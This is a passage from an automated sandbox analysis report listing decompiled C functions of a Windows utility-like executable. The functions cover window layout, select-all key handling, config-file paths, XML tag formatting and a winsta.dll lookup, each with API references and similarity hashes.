                                                                                                                0x00408427
                                                                                                                0x0040842c
                                                                                                                0x0040842f
                                                                                                                0x00408432
                                                                                                                0x00408435
                                                                                                                0x00408438
                                                                                                                0x00408439
                                                                                                                0x0040843e
                                                                                                                0x0040843f
                                                                                                                0x00408442
                                                                                                                0x0040844a

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$??2@??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252195045-0
                                                                                                                • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                                0x00406746
                                                                                                                0x00406746
                                                                                                                0x0040674f
                                                                                                                0x00406751
                                                                                                                0x00406752
                                                                                                                0x00406757
                                                                                                                0x00406758
                                                                                                                0x0040675d
                                                                                                                0x0040675f
                                                                                                                0x00406760
                                                                                                                0x00406765
                                                                                                                0x00406766
                                                                                                                0x0040676e
                                                                                                                0x00406770
                                                                                                                0x00406771
                                                                                                                0x00406776
                                                                                                                0x00406777
                                                                                                                0x0040677f
                                                                                                                0x00406781
                                                                                                                0x00406785
                                                                                                                0x00406787
                                                                                                                0x00406788
                                                                                                                0x0040678e
                                                                                                                0x0040678e
                                                                                                                0x00406790
                                                                                                                0x00406791
                                                                                                                0x00406796
                                                                                                                0x00406798
                                                                                                                0x0040679e
                                                                                                                0x004067a1
                                                                                                                0x004067a4
                                                                                                                0x004067ab

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                                0x0040aba8
                                                                                                                0x0040aba9
                                                                                                                0x0040abb0
                                                                                                                0x0040abb2
                                                                                                                0x0040abb5
                                                                                                                0x0040ac19
                                                                                                                0x0040ac2c
                                                                                                                0x0040ac2e
                                                                                                                0x0040ac36
                                                                                                                0x0040ac39
                                                                                                                0x0040ac39
                                                                                                                0x0040ac1b
                                                                                                                0x0040ac21
                                                                                                                0x0040ac21
                                                                                                                0x0040abb7
                                                                                                                0x0040abcb
                                                                                                                0x0040abce
                                                                                                                0x0040abd7
                                                                                                                0x0040abe6
                                                                                                                0x0040abf6
                                                                                                                0x0040abfe
                                                                                                                0x0040ac09
                                                                                                                0x0040ac0f
                                                                                                                0x0040ac12
                                                                                                                0x0040ac4f

                                                                                                                APIs
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                                0x00403a7d
                                                                                                                0x00403a8c
                                                                                                                0x00403a9c
                                                                                                                0x00403aba
                                                                                                                0x00403adf
                                                                                                                0x00403ae7
                                                                                                                0x00403af4
                                                                                                                0x00403af4
                                                                                                                0x00403ae7
                                                                                                                0x00403aba
                                                                                                                0x00403a9c
                                                                                                                0x00403b13

                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                  • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: State$CallMessageProcSendWindow
                                                                                                                • String ID: A
                                                                                                                • API String ID: 3924021322-3554254475
                                                                                                                • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                                0x004034f0
                                                                                                                0x004034f8
                                                                                                                0x00403506
                                                                                                                0x00403516
                                                                                                                0x0040351c
                                                                                                                0x00403531
                                                                                                                0x00403537
                                                                                                                0x00403545
                                                                                                                0x0040354a
                                                                                                                0x00403556
                                                                                                                0x00403567
                                                                                                                0x00403575
                                                                                                                0x00403583
                                                                                                                0x00403583
                                                                                                                0x00403586
                                                                                                                0x00403592
                                                                                                                0x00403598
                                                                                                                0x004035ac

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                • memset.MSVCRT ref: 00403537
                                                                                                                • _ultow.MSVCRT ref: 00403575
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset$_ultow
                                                                                                                • String ID: cf@$q
                                                                                                                • API String ID: 3448780718-2693627795
                                                                                                                • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				return E00402FC6(_t29, _t36,  &_v532);
			}










                                                                                                                0x00402f3a
                                                                                                                0x00402f51
                                                                                                                0x00402f60
                                                                                                                0x00402f6f
                                                                                                                0x00402f78
                                                                                                                0x00402f7a
                                                                                                                0x00402f7a
                                                                                                                0x00402f8a
                                                                                                                0x00402f8f
                                                                                                                0x00402f94
                                                                                                                0x00402f99
                                                                                                                0x00402f9e
                                                                                                                0x00402f9f
                                                                                                                0x00402fad
                                                                                                                0x00402fb2
                                                                                                                0x00402fb2
                                                                                                                0x00402fc5

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402F51
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                • wcscat.MSVCRT ref: 00402F8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                • String ID: .cfg
                                                                                                                • API String ID: 776488737-3410578098
                                                                                                                • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                                0x00407e2d
                                                                                                                0x00407e46
                                                                                                                0x00407e48
                                                                                                                0x00407e4d
                                                                                                                0x00407e5f
                                                                                                                0x00407e6b
                                                                                                                0x00407e6f
                                                                                                                0x00407e75
                                                                                                                0x00407e7c
                                                                                                                0x00407e7d
                                                                                                                0x00407e88
                                                                                                                0x00407e8d
                                                                                                                0x00407e8e
                                                                                                                0x00407eaa

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407E48
                                                                                                                • memset.MSVCRT ref: 00407E5F
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                                0x00405e0a
                                                                                                                0x00405e12
                                                                                                                0x00405e18
                                                                                                                0x00405e1c
                                                                                                                0x00405e1e
                                                                                                                0x00405e1e
                                                                                                                0x00405e24
                                                                                                                0x00405e2c
                                                                                                                0x00405e2e
                                                                                                                0x00405e44
                                                                                                                0x00405e49
                                                                                                                0x00405e4c
                                                                                                                0x00405e4d
                                                                                                                0x00405e68
                                                                                                                0x00405e74
                                                                                                                0x00405e74
                                                                                                                0x00000000
                                                                                                                0x00405e84
                                                                                                                0x00405e8c

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                0x00409a4a
                                                                                                                0x00409a4f
                                                                                                                0x00409a56
                                                                                                                0x00409a5e
                                                                                                                0x00409a60
                                                                                                                0x00409a6e
                                                                                                                0x00409a6e
                                                                                                                0x00409a60
                                                                                                                0x00409a71
                                                                                                                0x00409a76
                                                                                                                0x00000000
                                                                                                                0x00409a78
                                                                                                                0x00000000
                                                                                                                0x00409a89

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                • API String ID: 946536540-379566740
                                                                                                                • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                0x0040588e
                                                                                                                0x0040588f
                                                                                                                0x0040588f
                                                                                                                0x00405892
                                                                                                                0x00405896
                                                                                                                0x004058a9
                                                                                                                0x004058a9
                                                                                                                0x004058ad
                                                                                                                0x004058af
                                                                                                                0x004058b5
                                                                                                                0x004058b6
                                                                                                                0x004058b9
                                                                                                                0x004058c2
                                                                                                                0x004058c3
                                                                                                                0x004058c8
                                                                                                                0x004058d2
                                                                                                                0x004058d4
                                                                                                                0x004058d9
                                                                                                                0x004058e0
                                                                                                                0x004058ea
                                                                                                                0x004058ec
                                                                                                                0x004058ed
                                                                                                                0x004058f2
                                                                                                                0x004058f9
                                                                                                                0x00405902
                                                                                                                0x00405898
                                                                                                                0x00405898
                                                                                                                0x0040589a
                                                                                                                0x0040589c
                                                                                                                0x004058a1
                                                                                                                0x004058a2
                                                                                                                0x004058a5
                                                                                                                0x004058a7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004058a7
                                                                                                                0x00405912
                                                                                                                0x00405915
                                                                                                                0x0040591e
                                                                                                                0x0040591e
                                                                                                                0x00405907
                                                                                                                0x0040590b

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
